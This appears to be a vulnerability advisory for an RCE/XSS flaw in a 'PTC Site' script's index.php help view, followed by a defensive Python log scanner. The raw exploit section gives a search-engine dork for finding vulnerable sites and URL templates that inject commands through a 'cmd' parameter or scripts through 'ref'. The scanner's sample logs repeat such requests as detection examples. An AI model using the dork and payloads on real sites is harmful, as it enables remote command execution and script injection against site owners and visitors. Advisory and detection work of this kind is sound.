Vendor: PTC Site's RCE/XSS Vulnerability
By: CrazyMember
CVSS: 8.8 (HIGH)
RCE/XSS/HTML
CWE: 79
Product Name: PTC Site's RCE/XSS Vulnerability
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PTC Site’s RCE/XSS Vulnerability

The vulnerability is reached through the help view of 'index.php' (requests with 'view=help'). An attacker can inject malicious code into the 'ref' parameter of that request, which can be used to execute arbitrary commands or inject malicious scripts into the vulnerable website.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any application logic.

Exploit-DB raw data:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Title: PTC Site's RCE/XSS Vulnerability
@Vendor: http://www.ptcsites4sale.info & and etc...:D
@Author: CrazyMember
@SPC Thanks: XroGuE 4 r3p0r7 :P 
@Dork:"intext:Warning: passthru()" "inurl:view=help"

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Bug: http://[site]/index.php?view=help&faq=1&ref=[RCE/XSS/HTML]

Demo: 

#http://[site]/index.php?view=help&faq=1&ref=marykarma&cmd=[Your Command]
#http://[site]/index.php?view=help&faq=1&ref=[Your ScripT]

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
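For defenders, the request shape in the advisory can be hunted for in web server access logs. The following is an added example, not part of the original advisory or of the affected product: it assumes combined-format access log lines and assumes a legitimate `ref` value is a short alphanumeric referrer name; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate ref value is a short referrer username.
REF_OK = re.compile(r"[A-Za-z0-9_]{1,32}")
# Pulls the request target out of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return the reasons a request to the help view looks suspicious."""
    url = urlsplit(target)
    if not url.path.endswith("/index.php"):
        return []
    # parse_qs percent-decodes values, so encoded markup is seen in clear.
    params = parse_qs(url.query, keep_blank_values=True)
    if "help" not in params.get("view", []):
        return []
    reasons = []
    for ref in params.get("ref", []):
        if not REF_OK.fullmatch(ref):
            reasons.append("ref fails allow-list")
    if "cmd" in params:
        reasons.append("unexpected cmd parameter")
    return reasons

def scan(log_lines):
    """Return (line_number, reasons) for every suspicious log line."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            reasons = check_request(match.group(1))
            if reasons:
                findings.append((number, reasons))
    return findings

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php?view=help&faq=1&ref=marykarma HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2020:10:00:05 +0000] "GET /index.php?view=help&faq=1&ref=marykarma&cmd=id HTTP/1.1" 200 5300',
    '203.0.113.9 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php?view=help&faq=1&ref=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 5200',
    '203.0.113.7 - - [01/Jan/2020:10:00:12 +0000] "GET /index.php?view=home&ref=%3Cb%3E HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

The same allow-list used in `check_request` can be enforced server-side on `ref` before the value reaches any output or command path, which is the input validation the mitigation section calls for.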